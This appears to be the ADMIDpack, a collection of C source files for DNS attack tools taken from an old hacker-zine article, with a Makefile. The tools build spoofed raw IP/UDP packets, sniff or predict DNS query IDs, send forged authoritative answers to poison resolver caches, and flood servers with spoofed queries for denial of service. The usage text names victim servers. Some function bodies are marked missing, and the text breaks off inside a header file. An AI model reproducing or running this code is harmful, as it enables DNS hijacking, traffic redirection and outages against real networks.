#include "ip.h"
#include "udp.h"

/*****************************************************************************/
/*
 * in_cksum --
 *      Checksum routine for Internet Protocol family headers (C Version)
 */
/*****************************************************************************/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer = 0;

        /*
         * Our algorithm is simple, using a 32 bit accumulator (sum), we add
         * sequential 16 bit words to it, and at the end, fold back all the
         * carry bits from the top 16 bits into the lower 16 bits.
         */
        while (nleft > 1)  {
                sum += *w++;
                nleft -= 2;
        }

        /* mop up an odd byte, if necessary */
        if (nleft == 1) {
                *(u_char *)(&answer) = *(u_char *)w ;
                sum += answer;
        }

        /* add back carry outs from top 16 bits to low 16 bits */
        sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
        sum += (sum >> 16);                     /* add carry */
        answer = ~sum;                          /* truncate to 16 bits */
        return(answer);
}

/* Build an IP+UDP datagram with an arbitrary source address and send it
   through raw socket s (the caller must have set IP_HDRINCL on s). */
int udp_send(s,saddr,daddr,sport,dport,datagram,datasize)
int s;
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
char * datagram;
unsigned datasize;
{
        struct sockaddr_in sin;
        struct iphdr  *ip;
        struct udphdr *udp;
        unsigned char *data;
        unsigned char packet[4024];
        int x;

        ip   = (struct iphdr *)packet;
        udp  = (struct udphdr *)(packet+IPHDRSIZE);
        data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE);

        memset(packet,0,sizeof(packet));

        udp->source = htons(sport);
        udp->dest   = htons(dport);
        udp->len    = htons(UDPHDRSIZE+datasize);
        udp->check  = 0;        /* UDP checksum left at 0 (optional over IPv4) */

        memcpy(data,datagram,datasize);
        memset(packet,0,IPHDRSIZE);

        ip->saddr.s_addr = saddr;
        ip->daddr.s_addr = daddr;
        ip->version  = 4;
        ip->ihl      = 5;
        ip->ttl      = 245;
        ip->id       = random()%5985;
        ip->protocol = IPPROTO_UDP;
        ip->tot_len  = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
        ip->check    = 0;
        ip->check    = in_cksum((u_short *)packet,IPHDRSIZE);

        sin.sin_family      = AF_INET;
        sin.sin_addr.s_addr = daddr;
        sin.sin_port        = udp->dest;

        x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
                 (struct sockaddr*)&sin, sizeof(struct sockaddr));
        return(x);
}

/*****************************************************************************/
/* RECV PAKET                                                                */
/* get_pkt(socket, *buffer , size of the buffer);                            */
/*****************************************************************************/
int get_pkt(s,data,size)
int s;
unsigned char *data;
int size;
{
        struct sockaddr_in sin;
        socklen_t len;
        int resu;

        len= sizeof(sin);
        resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len);
        return resu;
}
<-->

<++> ADMIDpack/ADMDNS2.c
/*************************************************/
/* DNS include for play with DNS packet (c) ADM  */
/*************************************************/
#define ERROR -1
#define DNSHDRSIZE 12
#define TYPE_A   1
#define TYPE_PTR 12

/* random number in 1..150 */
int myrand()
{
        int j;
        j=1+(int) (150.0*rand()/(RAND_MAX+1.0));
        return(j);
}

/* resolve a host name or dotted quad to a network-order IPv4 address,
   0 on failure */
unsigned long host2ip(char *serv)
{
        struct sockaddr_in sinn;
        struct hostent *hent;

        hent=gethostbyname(serv);
        if(hent == NULL) return 0;
        bzero((char *)&sinn, sizeof(sinn));
        bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
        return sinn.sin_addr.s_addr;
}

/* convert "www.heike.com" to the label format [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] */
void nameformat(char *name,char *QS)
{ /* CRAP & LAme COde :) */
        char lol[3000];
        char tmp[2550];
        char tmp2[2550];
        int i,a=0;

        bzero(lol,sizeof(lol));
        bzero(tmp,sizeof(tmp));
        bzero(tmp2,sizeof(tmp2));
        for(i=0;i

 [The rest of nameformat(), the makepaketQS()/makepaketAW() question and
  answer builders, and the beginning of sendquestion() are missing from this
  copy of the article. The text resumes inside sendquestion(), which fills in
  the header of a query and sends it from a spoofed source address.]

        dns->id = 6000+myrand();
        dns->qr = 0;
        dns->rd = 1;
        dns->aa = 0;
        dns->que_num = htons(1);
        dns->rep_num = htons(0);
        i=makepaketQS(data,name,type);
        udp_send(sraw,s_ip,d_ip,1200+myrand(),53,buff,DNSHDRSIZE+i);
        close(sraw);
}

/* send one spoofed answer with the chosen ID, from s_ip:53 to d_ip:53 */
void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type)
{
        struct dnshdr *dns;
        char buff[1024];
        char *data;
        int i;
        int on=1;
        int sraw;

        if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
                perror("socket");
                exit(ERROR);
        }
        if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
                perror("setsockopt");
                exit(ERROR);
        }

        dns  = (struct dnshdr *) buff;
        data = (char *)(buff+DNSHDRSIZE);
        bzero(buff,sizeof(buff));

        dns->id = htons(ID);
        dns->qr = 1;
        dns->rd = 1;
        dns->aa = 1;
        dns->que_num = htons(1);
        dns->rep_num = htons(1);
        i=makepaketAW(data,name,spoofip,type);
        printf(" i after makepaket == %i \n",i);
        udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i);
        close(sraw);
}

/* ask the victim for the name a few times, then race the real answer with
   2 x 80 spoofed replies carrying IDs ID .. ID+79 */
void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type)
{
        struct dnshdr *dns;
        char buff[1024];
        char *data;
        u_long fakeip;
        u_long trustip;
        u_long victimip;
        int loop,rere;

        dns  = (struct dnshdr *)buff;
        data = (char *)(buff+DNSHDRSIZE);

        trustip  = host2ip(dnstrust);
        victimip = host2ip(victim);
        fakeip   = host2ip("12.1.1.0");

        /* send question ... */
        if( type == TYPE_PTR)
                for(loop=0;loop<4;loop++) sendquestion(fakeip,victimip,spoofip,type);
        if( type == TYPE_A)
                for(loop=0;loop<4;loop++) sendquestion(fakeip,victimip,spoofname,type);

        /* now it's time to answer, quickly !!! */
        for(rere = 0; rere < 2;rere++){
                for(loop=0;loop < 80;loop++){
                        printf("trustip %s,victimip %s,spoofname %s,spoofip %s,ID %i,type %i\n",
                               dnstrust,victim,spoofname,spoofip,ID+loop,type);
                        sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type);
                }
        }
}
<-->

<++> ADMIDpack/ADMdnsfuckr.c
/* ADM DNS DESTROYER */
#define DNSHDRSIZE 12
#define VERSION "0.2 pub"
#define ERROR -1

#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

int main(int argc, char **argv)
{
        struct dnshdr *dns;
        char *data;
        char buffer2[4000];
        char namez[255];
        unsigned long s_ip;
        unsigned long d_ip;
        int sraw,on=1;

        if(argc <2){printf(" usage : %s <dns server>\n",argv[0]); exit(0);}

        dns  = (struct dnshdr *)buffer2;
        data = (char *)(buffer2+DNSHDRSIZE);
        bzero(buffer2,sizeof(buffer2));

        if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
                perror("socket");
                exit(ERROR);
        }
        if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
                perror("setsockopt");
                exit(ERROR);
        }

        printf("ADMdnsFuker %s DNS DESTROYER made by the ADM crew\n",VERSION);
        printf("(c) ADM, Heike: yeah, everything that is mine is hers too ...\n");
        sleep(1);

        s_ip=host2ip("100.1.2.3");
        d_ip=host2ip(argv[1]);

        dns->id = 123;
        dns->rd = 1;
        dns->que_num = htons(1);

        /* endless stream of PTR queries for random in-addr.arpa names, each
           from the next spoofed source address. myrand() returns 1..150, so
           %03d keeps every label exactly the three bytes that the hard-coded
           \3 length octets announce. */
        while(1){
                sprintf(namez,"\3%03d\3%03d\3%03d\3%03d\07in-addr\04arpa",
                        myrand(),myrand(),myrand(),myrand());
                printf("%s\n",namez);
                strcpy(data,namez);
                *( (u_short *) (data+strlen(namez)+1) ) = htons(TYPE_PTR);  /* qtype  */
                *( (u_short *) (data+strlen(namez)+3) ) = htons(1);         /* qclass */
                /* header + name + terminating 0 + qtype + qclass */
                udp_send(sraw,s_ip,d_ip,2600+myrand(),53,buffer2,DNSHDRSIZE+strlen(namez)+5);
                s_ip=ntohl(s_ip); s_ip++; s_ip=htonl(s_ip);
        }
}
<-->

<++> ADMIDpack/ADMkillDNS.c
#include "ADM-spoof.c"
#include "dns.h"
#include "ADMDNS2.c"

#define ERROR -1
#define VERSION "0.3 pub"
#define ID_START 1
#define ID_STOP 65535
#define PORT_START 53
#define PORT_STOP 54

int main(int argc, char **argv)
{
        struct dnshdr *dns;
        char *data;
        char buffer2[4000];
        unsigned char namez[255];
        unsigned long s_ip,s_ip2;
        unsigned long d_ip,d_ip2;
        int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop;

        if(argc <5){
                system("/usr/bin/clear");
                printf(" usage : %s <ip src> <ip dst> <name> <ip>\n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]);
                printf(" ip src: ip source of the dns answer\n");
                printf(" ip dst: ip of the dns victim\n");
                printf(" name  : spoofed name, ex: www.dede.com\n");
                printf(" ip    : the ip to associate with the name\n");
                printf(" options \n");
                printf(" [A,B,N] \n");
                printf("   A: flood the DNS victim with multiple queries\n");
                printf("   B: DOS attack to destroy the DNS \n");
                printf("   N: no attack \n\n");
                printf(" [ID_START] \n");
                printf("   ID_START: id start :> \n\n");
                printf(" [ID_STOP] \n");
                printf("   ID_STOP : id stop :> \n\n");
                printf(" PORT START,PORT STOP: send the spoof to the ports portstart..portstop\n\n");
                printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION);
                exit(ERROR);
        }

        dns  = (struct dnshdr *)buffer2;
        data = (char *)(buffer2+DNSHDRSIZE);
        bzero(buffer2,sizeof(buffer2));

        if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
                perror("socket");
                exit(ERROR);
        }
        if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
                perror("setsockopt");
                exit(ERROR);
        }

        printf("ADMkillDNS %s",VERSION);
        printf("\nyeah well, I dedicate this to my Heike");
        printf("\nREADY FOR ACTION!\n");

        s_ip2=s_ip=host2ip(argv[1]);
        d_ip2=d_ip=host2ip(argv[2]);

        /* option A: ten queries for the name from consecutive spoofed source
           addresses, so the victim has lookups in flight */
        if(argc>5)if(*argv[5]=='A') {
                for(loop=0;loop<10;loop++){
                        dns->id = 6000+loop;
                        dns->qr = 0;
                        dns->rd = 1;
                        dns->aa = 0;
                        dns->que_num = htons(1);
                        dns->rep_num = htons(0);
                        i=makepaketQS(data,argv[3],TYPE_A);
                        udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i);
                        s_ip=ntohl(s_ip); s_ip++; s_ip=htonl(s_ip);
                }
        } /* end of DNS query flood */

        /* here is the DoS routine */
        if(argc>5)if(*argv[5]=='B') {
                s_ip=host2ip("100.1.2.3");
                dns->id = 123;
                dns->rd = 1;
                dns->que_num = htons(1);
                printf("plz enter the number of packets you wanna send\n");
                scanf("%i",&i);
                for(x=0;x

 [The body of this loop is missing from this copy of the article; the text
  resumes at the option parsing below.]

        if(argc > 6 )idstart = atoi(argv[6]); else idstart = ID_START;
        if(argc > 7 )idstop  = atoi(argv[7]); else idstop  = ID_STOP;
        if(argc > 9 ){
                portstart = atoi(argv[8]);
                portstop  = atoi(argv[9]);
        } else {
                portstart = PORT_START;
                portstop  = PORT_STOP;
        }

        bzero(buffer2,sizeof(buffer2));
        bzero(namez,sizeof(namez));
        i=0;
        s_ip=s_ip2;
        d_ip=d_ip2;

        /* the spoof itself: one answer per ID in [idstart,idstop), each sent
           to every port in [portstart,portstop) */
        x=portstart;
        for(;idstart<idstop;idstart++){
                dns->id = htons(idstart);
                dns->qr = 1;
                dns->rd = 1;
                dns->aa = 1;
                dns->que_num = htons(1);
                dns->rep_num = htons(1);
                printf("send answer with id %i to ports %i to %i\n",idstart,portstart,portstop);
                i=makepaketAW(data,argv[3],argv[4],TYPE_A);
                for(;x < portstop; x++)
                        udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i);
                x = portstart;
        }
        printf(" terminated..\n");
        return 0;
}
<-->

<++> ADMIDpack/ADMnOg00d.c
/***************************/
/*  ADMnog00d (c) ADM      */
/***************************/
/*  ADM DNS ID PREDICTOR   */
/***************************/
#include "dns.h"
#include "ADM-spoof.c"
#include "ADMDNS2.c"

#define VERSION "0.7 pub"
#define SPOOFIP "4.4.4.4"
#define ERROR -1
#define LEN sizeof(struct sockaddr)
#define UNDASPOOF "111.111.111.111"
#define TIMEOUT 300
#define DNSHDRSIZE 12

void usage()
{
        printf(" ADMnoG00D [ID] \n");
        printf("\n ex: ADMnoG00d ppp.evil.com ns1.victim.com provnet.fr ns.victim.com 1 mouhhahahaha.hol.fr 31.3.3.7 ns.isdnet.net [ID] \n");
        printf(" well... we are going to poison ns.victim.com so that it resolves mouhhahaha.hol.fr to 31.3.3.7\n");
        printf(" we use provnet.fr and ns1.provnet.fr to find the ID of ns.victim.com\n");
        printf(" we spoof ns.isdnet.net because it has authority over *.hol.fr\n");
        printf(" for more information..\n");
        printf(" check ftp.janova.org/pub/ADM/ \n");
        printf(" mail ADM@janova.org \n");
        printf(" ask Heike from me...:) \n");
        exit(-1);
}

/* send a question (dns->qr == 0) or an answer (dns->qr == 1) for wwwname
   to d_ip:53 over a normal UDP socket, header fields taken from *dns */
void senddnspkt(s,d_ip,wwwname,ip,dns)
int s;
u_long d_ip;
char *wwwname;
char *ip;
struct dnshdr *dns;
{
        struct sockaddr_in sin;
        int i;
        char buffer[1024];
        char *data = (char *)(buffer+DNSHDRSIZE);

        bzero(buffer,sizeof(buffer));
        memcpy(buffer,dns,DNSHDRSIZE);
        sin.sin_family      = AF_INET;
        sin.sin_port        = htons(53);
        sin.sin_addr.s_addr = d_ip;
        if(dns->qr == 0)
                i=makepaketQS(data,wwwname,TYPE_A);
        else
                i=makepaketAW(data,wwwname,ip,TYPE_A);
        sendto(s,buffer,DNSHDRSIZE+i,0,(struct sockaddr *)&sin,LEN);
}

/* non-recursive question: the server may only answer from what it already
   has cached, which is how the poisoning attempt is checked */
void dns_qs_no_rd(s,d_ip,wwwname,ID)
int s;
u_long d_ip;
char *wwwname;
int ID;
{
        struct dnshdr *dns;
        char *data;
        char buffer[1024];
        int i;

        dns  = (struct dnshdr *)buffer;
        data = (char *)(buffer+DNSHDRSIZE);
        bzero(buffer,sizeof(buffer));
        dns->id = htons(ID);
        dns->qr = 0;
        dns->rd = 0;    /* don't want recursion !!
*/ dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,wwwname,TYPE_A); senddnspkt(s,d_ip,wwwname,NULL,dns); } void main(int argc, char **argv) { struct sockaddr_in sin_rcp; struct dnshdr *dns, *dns_recv; char *data, *data2; char buffer2[4000]; char buffer[4000]; char spoofname[255]; char spoofip[255]; char dnstrust[255]; char bla[255]; char *alacon; unsigned char fakename[255]; unsigned char namez[255]; unsigned long s_ip, s_ip2; unsigned long d_ip, d_ip2, trust; unsigned int DA_ID = 65535, loop = 65535; int sraw, s_r, i, on=1, x, ID,timez; int len = sizeof(struct sockaddr); dns_recv = (struct dnshdr *)(buffer); data2 = (char *)(buffer+DNSHDRSIZE); dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); srand(time(NULL)); if( (s_r=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) == ERROR ){ perror("socket"); exit(ERROR); } if( (fcntl(s_r,F_SETFL,O_NONBLOCK)) == ERROR ){ perror("fcntl"); exit(ERROR); } if ((sraw = socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR ){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == ERROR)){ perror("setsockopt"); exit(ERROR); } if(argc < 2) usage(); if(argc > 9 )DA_ID = loop = atoi(argv[9]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if( argc > 8 ) strcpy(bla,argv[8]); else{ printf("enter the DNS trust of the victim:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); printf("ADMnoG00d %s\n",VERSION); printf("\033[1mHeike\033[0m ownz Me So g\033[5m\033[36m0\033[0m\033[1m0\033[0md\n"); sleep(1); printf("\nLets Play =)!!\n"); /* save some param */ s_ip2 = host2ip(argv[1]); d_ip2 = d_ip = host2ip(argv[4]); trust = host2ip(argv[2]); s_ip = 
host2ip(UNDASPOOF); while(1){ sprintf(fakename,"%i%i%i%i%i%i.%s", myrand(), myrand(), myrand(), myrand(), myrand(), myrand(), argv[3]); sendquestion(s_ip,d_ip,fakename,TYPE_A); /* end of question packet */ bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* here start the spoof anwser */ ID = loop; for(;loop >= ID-10 ;loop--){ dns->id = htons(loop); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); i=makepaketAW(data,fakename,SPOOFIP,TYPE_A); udp_send(sraw,trust,d_ip2,53,53,buffer2,DNSHDRSIZE+i); } bzero(buffer2,sizeof(buffer2)); /* RE init some variable */ bzero(namez,sizeof(namez)); i=0; x=0; /* time for test spoof */ dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); /* here we sending question */ /* non recursive ! */ /* we waiting for awnser ... */ while(1){ for(timez=0;timez < TIMEOUT; timez++){ if( recvfrom(s_r,buffer,sizeof(buffer),0,(struct sockaddr *)&sin_rcp,&len) != -1 ) { printf("ok whe have the reponse ;)\n"); timez = 0; break; } usleep(10); timez++; } if(timez != 0){ printf("hum no reponse from the NS ressend question..\n"); dns_qs_no_rd(s_r,d_ip2,fakename,myrand()); } else break; } /* ok we have a awnser */ printf("fakename = %s\n",fakename); if(sin_rcp.sin_addr.s_addr == d_ip2 ) if(sin_rcp.sin_port == htons(53) ) { if( dns_recv->qr == 1 ) if( dns_recv->rep_num == 0 ) /* hum we dont have found the right ID */ printf("try %i < ID < %i \n",ID-10,ID); else{ /* Hoho we have the spoof has worked we have found the right ID ! 
*/ printf("the DNS ID of %s iz %i< ID <%i !!\n",argv[4],loop-10,loop); printf("let's send the spoof...\n"); dnsspoof(dnstrust,argv[4],spoofname,spoofip,loop,atoi(argv[5])); printf("spoof sended ...\n"); exit(0); } } /* end of if (sin_rcp.sin_port == htons(53) ) */ bzero(buffer,sizeof(buffer)); } /* end of while loop */ }/* end of proggies */ <--> <++> ADMIDpack/ADMsnOOfID.c #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #include #include #define DNSHDRSIZE 12 #define SPOOF "127.0.0.1" #define VERSION "ver 0.6 pub" #define ERROR -1 int ETHHDRSIZE; void main(argc, argv) int argc; char *argv[]; { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char namefake[255]; char buffer2[1024]; char ebuf[255]; char spoofname[255]; char spoofip[255]; char bla[255]; char dnstrust[255]; char *alacon; unsigned long s_ipns; unsigned long d_ip; int sraw, i, on=1, con, ID,DA_ID,type; srand( (time(NULL) % random() * random()) ); if(argc <2){ printf("usage : %s \n",argv[0]); printf("ex: %s eth0 ns.victim.com hacker.org 123.4.5.36 12 damn.diz.ip.iz.ereet.ya mail.provnet.fr ns2.provnet.fr \n",argv[0]); printf(" So ... we tryed to poison victim.com with type 12 (PTR) .. 
now if som1 asked for the ip of mail.provnet.fr they have resoled to damn.diz.ip.iz.ereet.ya\n"); exit(0); } if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; if(argc>5)type=atoi(argv[5]); if(argc > 6)strcpy(spoofname,argv[6]); else{ printf("enter the name you wanna spoof:"); scanf("%s",spoofname); } if(argc > 7)strcpy(bla,argv[7]); else{ printf("enter the ip's of the spoof name:"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(spoofip,alacon); if(argc > 8)strcpy(bla,argv[8]); else{ printf("enter the dns trust for the spoof\n"); scanf("%s",bla); } alacon =(char *)inet_ntoa(host2ip(bla)); strcpy(dnstrust,alacon); dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMsn0ofID.c %s ADM ID sniffer\n",VERSION); printf("ADMsnO0fID (\033[5m\033[01mc\033[0m) ADM,Heike\n"); sleep(1); pcap_d = pcap_open_live(argv[1],1024,0,100,ebuf); s_ipns = host2ip(argv[4]); d_ip = host2ip(argv[2]); con = myrand(); /* make the question for get the ID */ sprintf(namefake,"%d%d%d.%s",myrand(),myrand(),myrand(),argv[3]); dnssend->id = 2600; dnssend->qr = 0; dnssend->rd = 1; dnssend->aa = 0; dnssend->que_num = htons(1); dnssend->rep_num = htons(0); i = makepaketQS(data2,namefake,TYPE_A); udp_send(sraw, s_ipns, d_ip,2600+con, 53, buffer2, DNSHDRSIZE+i); printf("Question sended...\n"); printf("Its Time to w8 \n"); while(1) { buffer = (u_char *)pcap_next(pcap_d,&h); /* catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == IPPROTO_UDP){ printf("[%s:%i 
->",inet_ntoa(ip->saddr),ntohs(udp->source)); printf("%s:%i]\n",inet_ntoa(ip->daddr),ntohs(udp->dest)); } if(ip->protocol == 17 ) if(ip->saddr.s_addr == d_ip ) if(ip->daddr.s_addr == s_ipns ) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0 ) { printf("kewl :)~ we have the packet !\n"); ID = dnsrecv->id ; /* we get the id */ printf("the current id of %s is %d \n",argv[2],ntohs(ID)); DA_ID = ntohs(ID); printf("send the spoof...\n"); dnsspoof(dnstrust,argv[2],spoofname,spoofip,DA_ID,type); printf("spoof sended...\n"); exit(0); } } /* well now we have the ID we cant predict the ID */ } <--> <++> ADMIDpack/ADMsniffID.c #include #include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define DNSHDRSIZE 12 #define VERSION "ver 0.4 pub" int ETHHDRSIZE; void usage(){ printf("usage : ADMsniffID \n"); printf("ex: ADMsniffID eth0 \"127.0.0.1\" \"www.its.me.com\" \n"); exit(ERROR); } void main(int argc, char **argv) { struct pcap_pkthdr h; struct pcap *pcap_d; struct iphdr *ip; struct udphdr *udp; struct dnshdr *dnsrecv,*dnssend; char *data; char *data2; char *buffer; char SPOOFIP[255]; char bla[255]; char spoofname[255]; char tmp2[255]; char ebuf[255]; char buffer2[1024]; unsigned char namez[255]; int sraw,on=1,tmp1,type; if(argc <2)usage(); if(strstr(argv[1],"ppp0"))ETHHDRSIZE = 0; else ETHHDRSIZE = 14; strcpy(SPOOFIP,argv[2]); strcpy(spoofname,argv[3]); type = atoi(argv[4]); /* Buffer 'n' tcp/ip stuff */ dnssend = (struct dnshdr *)buffer2; data2 = (char *)(buffer2+12); /* bzero(buffer,sizeof(buffer)); */ bzero(bla,sizeof(bla)); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if( (setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } /* open pcap descriptor */ pcap_d = pcap_open_live(argv[1],sizeof(buffer),0,100,ebuf); printf("ADMsniffID %s (c) ADMnHeike\n",VERSION); while(1){ buffer =(u_char *)pcap_next(pcap_d,&h); /* 
catch the packet */ ip = (struct iphdr *)(buffer+ETHHDRSIZE); udp = (struct udphdr *)(buffer+ETHHDRSIZE+IPHDRSIZE); dnsrecv = (struct dnshdr *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE); data = (char *)(buffer+ETHHDRSIZE+IPHDRSIZE+UDPHDRSIZE+DNSHDRSIZE); if(ip->protocol == 17) if(udp->dest == htons(53) ) if(dnsrecv->qr == 0) { strcpy(namez,data); nameformat(namez,bla); printf("hum we have a DNS question from %s diz guyz wanna %s!\n",inet_ntoa(ip->saddr),(char *)bla); bzero(bla,sizeof(bla)); printf("the question have the type %i and type of the query %i\n" ,ntohs(*((u_short *)(data+strlen(data)+1))) ,ntohs(*((u_short *)(data+strlen(data)+2+1)))); /* well in diz version we only spoof the type 'A' */ /* check out for a new version in ftp.janova.org/pub/ADM */ printf("make the spoof packet...\n"); printf("dns header\n"); /* here we gonna start to make the spoofed paket :)*/ memcpy(dnssend,dnsrecv,DNSHDRSIZE+strlen(namez)+5); dnssend->id=dnsrecv->id; /* haha the ID ;) */ dnssend->aa=1; /* i've the authority */ dnssend->ra=1; /* i've the recusion */ dnssend->qr=1; /* its a awser */ dnssend->rep_num = htons(1); /* i've one awnser */ printf("ID=%i\nnumba of question=%i\nnumba of awnser =%i\n" ,dnssend->id,ntohs(dnssend->que_num),ntohs(dnssend->rep_num)); printf("Question..\n"); printf("domainename=%s\n",data2); printf("type of question=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1)))); printf("type of query=%i\n",ntohs(*((u_short *)(data2+strlen(namez)+1+2)))); if( type == TYPE_PTR){ tmp1=strlen(namez)+5; strcpy(data2+tmp1,namez); tmp1=tmp1+strlen(namez)+1; bzero(tmp2,sizeof(tmp2)); nameformat(spoofname,tmp2); printf("tmp2 = %s\n",tmp2); printf(" mouhahahah \n"); *((u_short *)(data2+tmp1)) = htons(TYPE_PTR); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(strlen((tmp2)+1)); printf("bhaa?.\n"); strcpy((data2+tmp1+2+2+4+2),tmp2); printf(" ouf !! 
=) \n"); tmp1 = tmp1 +strlen(tmp2)+ 1; } if( type == TYPE_A){ tmp1=strlen(namez)+5; strcpy(data2+tmp1,namez); tmp1=tmp1+strlen(namez)+1; *((u_short *)(data2+tmp1)) = htons(TYPE_A); *((u_short *)(data2+tmp1+2)) = htons(1); *((u_long *)(data2+tmp1+2+2)) = htonl(86400); *((u_short *)(data2+tmp1+2+2+4)) = htons(4); *((u_long *)(data2+tmp1+2+2+4+2)) = host2ip(SPOOFIP); } printf("Answer..\n"); printf("domainname=%s\n",tmp2); printf("type=%i\n",ntohs(*((u_short *)(data2+tmp1)))); printf("classe=%i\n",ntohs(*((u_short *)(data2+tmp1+2)))); printf("time to live=%u\n",ntohl(*((u_long *)(data2+tmp1+2+2)))); printf("resource data lenght=%i\n",ntohs(*((u_short *)(data2+tmp1+2+2+4)))); printf("IP=%s\n",inet_ntoa(*((u_long *)(data2+tmp1+2+2+4+2)))); tmp1=tmp1+2+2+4+2+4; /* now tmp1 == the total length of packet dns */ /* without the dnshdr */ udp_send(sraw ,ip->daddr ,ip->saddr ,ntohs(udp->dest) ,ntohs(udp->source) ,buffer2 ,DNSHDRSIZE+tmp1); } /* end of the spoof */ } /* end of while(1) */ } /* The End !! ;) */ <--> <++> ADMIDpack/Makefile # version 0.1 #/usr/contrib/bin/gcc -L. -I. ADMkillDNS.c -lsocket -lnsl -lpcap -o ../ADMbin/ADMkillDNS SHELL = /bin/sh # uncomment this if your are not on LinuX #LIBS = -lsocket -lnsl -lpcap # CC = gcc LIBS = -lpcap BIN = . CFLAGS = -I. -L. 
all: ADMkillDNS ADMsnOOfID ADMsniffID ADMdnsfuckr ADMnOg00d

ADMkillDNS: ADMkillDNS.c
	$(CC) $(CFLAGS) ADMkillDNS.c $(LIBS) -o $(BIN)/ADMkillDNS

ADMsnOOfID: ADMsnOOfID.c
	$(CC) $(CFLAGS) ADMsnOOfID.c $(LIBS) -o $(BIN)/ADMsnOOfID

ADMsniffID: ADMsniffID.c
	$(CC) $(CFLAGS) ADMsniffID.c $(LIBS) -o $(BIN)/ADMsniffID

ADMdnsfuckr: ADMdnsfuckr.c
	$(CC) $(CFLAGS) ADMdnsfuckr.c $(LIBS) -o $(BIN)/ADMdnsfuckr

ADMnOg00d: ADMnOg00d.c
	$(CC) $(CFLAGS) ADMnOg00d.c $(LIBS) -o $(BIN)/ADMnOg00d

clean:
	rm -f $(BIN)/*o $(BIN)/ADMsniffID $(BIN)/ADMsnOOfID $(BIN)/ADMnOg00d \
	$(BIN)/ADMkillDNS $(BIN)/ADMdnsfuckr
<-->
<++> ADMIDpack/bpf.h
/*-
 * Copyright (c) 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997
